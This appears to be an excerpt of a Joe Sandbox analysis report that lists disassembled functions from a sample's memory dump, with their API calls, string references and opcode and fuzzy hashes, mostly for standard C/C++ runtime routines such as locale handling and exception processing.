Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c438305e5af7bc1e8907209f761201336ea489bb7dbb8c774fca768a4df66f30
Instruction ID: 608a2960e0178aeee9482cd669d369bdfe6809e94535fe1f45c2fc3912bde41e
Opcode Fuzzy Hash: c438305e5af7bc1e8907209f761201336ea489bb7dbb8c774fca768a4df66f30
Instruction Fuzzy Hash: 6F21FB22740200AAD774AF14CE01A9773A7AB98F6BB165C25FD0AF7110E731FD48CB50

Function 00E50870 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E46730: GetLastError.KERNEL32(?,00000008,00E4964C), ref: 00E46734
Part of subcall function 00E46730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00E467D6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00E5097C
IsValidCodePage.KERNEL32(00000000), ref: 00E509C5
IsValidLocale.KERNEL32(?,00000001), ref: 00E509D4
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00E50A1C
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00E50A3B

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: e4e90dde098e69a3a0bd7a88b1dc75e3d450c285a6919355949c33f18c69b84a
Instruction ID: 8ff55969b526dd0e4ec9d4fe6e294a892b2ddc1c85826989077811c77b7aadd9
Opcode Fuzzy Hash: e4e90dde098e69a3a0bd7a88b1dc75e3d450c285a6919355949c33f18c69b84a
Instruction Fuzzy Hash: 0E519072A00605AFEB10DFA5CD41AAEB3B8EF88306F045C29FD11F7196DB709948CB61

Function 00E43050 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

$, xrefs: 00E4306B, 00E431EE, 00E43417, 00E433B0, 00E4323D
$, xrefs: 00E43393, 00E43371

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID:
String ID: $$$
API String ID: 0-2830927801
Opcode ID: a4f3a54db89fbb62046169a24586f7d391bc7c95b58a475ac80c624a344fee02
Instruction ID: 6453a7624b67cb4dd6bbfff6cb0d259a3cf313f04e564bbccd130d90b4904b6f
Opcode Fuzzy Hash: a4f3a54db89fbb62046169a24586f7d391bc7c95b58a475ac80c624a344fee02
Instruction Fuzzy Hash: B8F14D71E012199FDF14CFA8D8806ADB7B1FF88324F159269E829B7390D730AE05CB90

Function 00E4FF0C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E46730: GetLastError.KERNEL32(?,00000008,00E4964C), ref: 00E46734
Part of subcall function 00E46730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00E467D6

GetACP.KERNEL32(?,?,?,?,?,?,00E44DBB,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00E4FFCD
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00E44DBB,?,?,?,00000055,?,-00000050,?,?), ref: 00E4FFF8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00E5015B

Strings

utf8, xrefs: 00E500CA

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: b3649f2d44fa248bbe261dcdaf4e15387e6f4831258450de34464a1819c12cb7
Instruction ID: d6cd40e2a8d53242e7d97cbb5d318bf970e7c4ce50f9e4fb2666b22d1a41dd2a
Opcode Fuzzy Hash: b3649f2d44fa248bbe261dcdaf4e15387e6f4831258450de34464a1819c12cb7
Instruction Fuzzy Hash: 1171F431A00302ABDB24AB74DC46BAB73E8EF49B15F14683AF905F71D1EB70E9498751

Function 00E477D9 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E47866

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 1ab9c4a2e1108fa885ed9bc233477250a89243ad6877a4383d0d79e0ea462a6b
Instruction ID: 7c8af73978df03ff88e76c678efb22983a13ad900e55da8650213e9b7150675f
Opcode Fuzzy Hash: 1ab9c4a2e1108fa885ed9bc233477250a89243ad6877a4383d0d79e0ea462a6b
Instruction Fuzzy Hash: FBB15832D082959FDB15CF68D881BEEBBE5EF49304F15916AE984BB241D3349E01CBE0

Function 00E4D43A Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00E4D52A
FindNextFileW.KERNEL32(00000000,?), ref: 00E4D61E
FindClose.KERNEL32(00000000), ref: 00E4D65D
FindClose.KERNEL32(00000000), ref: 00E4D690

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: bc47553ecee2f74a67a2a2fec2128e77409b45c45a07051a9d460a996ebd2514
Instruction ID: 8102dbcd600fbf49a967a74c630f6f75bf6304721a6e9badb57a8e66f575df3c
Opcode Fuzzy Hash: bc47553ecee2f74a67a2a2fec2128e77409b45c45a07051a9d460a996ebd2514
Instruction Fuzzy Hash: FC71E271D091289FDF20EF28EC99AEEBBF9AB05308F1451D9E04DB3211DA359E858F50

Function 00E3993A Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00E39946
IsDebuggerPresent.KERNEL32 ref: 00E39A12
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E39A2B
UnhandledExceptionFilter.KERNEL32(?), ref: 00E39A35

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0599aabe7187f2e95b2f29f6e5e1c4307b378bd8288ea6e4fd2ee1e6cde220ae
Instruction ID: 7026db16d21c1c8dddd798e79e324c14e2ba60e325b00c62f626f04fc31c3cfa
Opcode Fuzzy Hash: 0599aabe7187f2e95b2f29f6e5e1c4307b378bd8288ea6e4fd2ee1e6cde220ae
Instruction Fuzzy Hash: 4231F875D012189BDF20DF65D9897CDBBB8AF08300F1041AAE40DBB251EBB09A85CF45

Function 00E32260 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E32275
std::_Lockit::_Lockit.LIBCPMT ref: 00E3228F
std::_Lockit::~_Lockit.LIBCPMT ref: 00E322B0
std::_Lockit::~_Lockit.LIBCPMT ref: 00E32308
std::_Lockit::_Lockit.LIBCPMT ref: 00E3234D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E3239E
__Getctype.LIBCPMT ref: 00E323B5
std::_Facet_Register.LIBCPMT ref: 00E323DF
std::_Lockit::~_Lockit.LIBCPMT ref: 00E323F8

Part of subcall function 00E35B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00E35B86

Strings

bad locale name, xrefs: 00E32407

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 2137871723-1405518554
Opcode ID: 45078bc93889f4a5f825bc754ff3ce4edc7c4081e3266733f9f80a0d60f34dcb
Instruction ID: 6c95e0946d36329e7e63a7110a6706bd85d406e334a274dc2495578b1fdb5d27
Opcode Fuzzy Hash: 45078bc93889f4a5f825bc754ff3ce4edc7c4081e3266733f9f80a0d60f34dcb
Instruction Fuzzy Hash: F241ED325083409FC310DF58D888B9ABBE0AF95714F05295EE984B7362DB39E849CB82

Function 00E32420 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E32435
std::_Lockit::_Lockit.LIBCPMT ref: 00E3244F
std::_Lockit::~_Lockit.LIBCPMT ref: 00E32470
std::_Lockit::~_Lockit.LIBCPMT ref: 00E324CB
std::_Lockit::_Lockit.LIBCPMT ref: 00E32513
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E32571
__Getctype.LIBCPMT ref: 00E32588
std::_Facet_Register.LIBCPMT ref: 00E325DB
std::_Lockit::~_Lockit.LIBCPMT ref: 00E325F4

Part of subcall function 00E35B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00E35B86

Strings

bad locale name, xrefs: 00E32603

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 2137871723-1405518554
Opcode ID: 574eb5461d92f546a669da904053553a3b4b5c6d122f0e174ed835ccf0935a6a
Instruction ID: 8eedfd92279501f84f3dc9e650b985324a03837d3720879c25ccb95a12075878
Opcode Fuzzy Hash: 574eb5461d92f546a669da904053553a3b4b5c6d122f0e174ed835ccf0935a6a
Instruction Fuzzy Hash: 3951D332504750DFC720DF28C44875ABBE0EF98714F14594EE999B7322EB31E989CB92

Function 00E32610 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E32622
std::_Lockit::_Lockit.LIBCPMT ref: 00E3263F
std::_Lockit::~_Lockit.LIBCPMT ref: 00E32660
std::_Lockit::~_Lockit.LIBCPMT ref: 00E326BB
std::_Lockit::_Lockit.LIBCPMT ref: 00E326FC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E3273F
std::_Facet_Register.LIBCPMT ref: 00E32768
std::_Lockit::~_Lockit.LIBCPMT ref: 00E32781

Part of subcall function 00E35B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00E35B86

Strings

bad locale name, xrefs: 00E32790

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 3096327801-1405518554
Opcode ID: da02fbadec07832c8572cbe7c967b88f7385623f935dfe44c9704a49013ad38d
Instruction ID: 7c5d122664c92ce95e0f85d5e7a0286a8144ad50a3ad08eb8a1597471f54a2f5
Opcode Fuzzy Hash: da02fbadec07832c8572cbe7c967b88f7385623f935dfe44c9704a49013ad38d
Instruction Fuzzy Hash: D041BC726043118FC310DF29D889A5ABBE0BF95710F04695EE998B7322DB35ED49CB92

Function 00E33570 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E335D1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E33618
Concurrency::cancel_current_task.LIBCPMT ref: 00E336DA
Concurrency::cancel_current_task.LIBCPMT ref: 00E336DF
Concurrency::cancel_current_task.LIBCPMT ref: 00E336E4

Strings

false, xrefs: 00E33672
true, xrefs: 00E33698
bad locale name, xrefs: 00E336E9

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 6b99ac0ecb16a22df4a203648c425bc96619d9849c55a120fdbb50b85a3e8ea8
Instruction ID: bced6284efa9501f6d1086ea5ffff1dc6bfb08200731f0b41cb0458329ca30a1
Opcode Fuzzy Hash: 6b99ac0ecb16a22df4a203648c425bc96619d9849c55a120fdbb50b85a3e8ea8
Instruction Fuzzy Hash: BF419D71505340AFC720DF798986B9ABFE0AF94704F44682DF898B7352E771DA09CB52

Function 00E38FDB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E38FE1
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00E38FEF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00E39000
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00E39011

Strings

GetTempPath2W, xrefs: 00E39006
GetCurrentPackageId, xrefs: 00E38FE9
GetSystemTimePreciseAsFileTime, xrefs: 00E38FF5
kernel32.dll, xrefs: 00E38FDC

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 1a9364a6cec7c69482a60320d6d79c660527868aba21991553167cb6b6a22ab2
Instruction ID: f9a595ab3ba35265c86cb5e8da9ac69012b5fe46e860ae6a27bf8954492d13fa
Opcode Fuzzy Hash: 1a9364a6cec7c69482a60320d6d79c660527868aba21991553167cb6b6a22ab2
Instruction Fuzzy Hash: FCE0B631551710EFE7059F7ABD0D8DB3AA8BB09713301191BF901F21E2DAB9040ECB60

Function 00E3C798 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E3C8B7
___TypeMatch.LIBVCRUNTIME ref: 00E3C9C5
_UnwindNestedFrames.LIBCMT ref: 00E3CB17
CallUnexpected.LIBVCRUNTIME ref: 00E3CB32

Strings

csm, xrefs: 00E3C7D5
csm, xrefs: 00E3C842
csm, xrefs: 00E3C8EE

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 6b91aafc3624473d65cff48a856f34a53808ccad0a45fc9fb23fa7c9dafacc3a
Instruction ID: cba256e06d8330fc3ea128261d43686fde1b8a2f529a6b912c17cfdcba43e65c
Opcode Fuzzy Hash: 6b91aafc3624473d65cff48a856f34a53808ccad0a45fc9fb23fa7c9dafacc3a
Instruction Fuzzy Hash: 87B17A71800209EFCF18DFA4C8899AEBFB5FF44314F24A56AE8157B212D731EA51CB91

Function 00E4C5D8 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00E4C851

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 4f5b5c3e1c45274729bd8982d5f7c87bdd19ac6e2654ba9f379539eec9711e09
Instruction ID: 2bb762563eae55ba9cf1a627d06277ed7d31bcc28ee9c15fb2256ae59a2c30ff
Opcode Fuzzy Hash: 4f5b5c3e1c45274729bd8982d5f7c87bdd19ac6e2654ba9f379539eec9711e09
Instruction Fuzzy Hash: 7BB11370E05209AFDB54DFA9E880BADBBF1BF89304F246199E501BB292C7709D45CB64

Function 00E54E74 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00E54F1A
__alloca_probe_16.LIBCMT ref: 00E54FD5
__alloca_probe_16.LIBCMT ref: 00E55064
__freea.LIBCMT ref: 00E550AF
__freea.LIBCMT ref: 00E550B5
__freea.LIBCMT ref: 00E550EB
__freea.LIBCMT ref: 00E550F1
__freea.LIBCMT ref: 00E55101

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 5578e3250294e06a89589059fa9a000db166c4b897964478cf6e6309f64cfad3
Instruction ID: 42687830b151118b73cc789de61d77fcfcb6628c4e663cc54f15308058d89db6
Opcode Fuzzy Hash: 5578e3250294e06a89589059fa9a000db166c4b897964478cf6e6309f64cfad3
Instruction Fuzzy Hash: 1A712973A00A059BDF209F548D92BEF7BE6AF4531AF252819EC04B72C1DB319C48C7A1

Function 00E38C74 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00E38CBD
__alloca_probe_16.LIBCMT ref: 00E38CE9
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00E38D28
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E38D45
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00E38D84
__alloca_probe_16.LIBCMT ref: 00E38DA1
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E38DE3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E38E06

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 87db77944b478a6abfff0617eacda4f128066c8e7e70ea664ca3933e850c3498
Instruction ID: 1f8a8053e755e40a0a0b1951b6c3eec08b54a44067d4f1016b71e60b0cccbb8f
Opcode Fuzzy Hash: 87db77944b478a6abfff0617eacda4f128066c8e7e70ea664ca3933e850c3498
Instruction Fuzzy Hash: E2519E7250031AAFEB249F62CE49FAB7FA9EF44748F145425F905B6190DF308D14DBA0

Function 00E37B24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E37B2B
std::_Lockit::_Lockit.LIBCPMT ref: 00E37B35

Part of subcall function 00E33260: std::_Lockit::_Lockit.LIBCPMT ref: 00E3326F
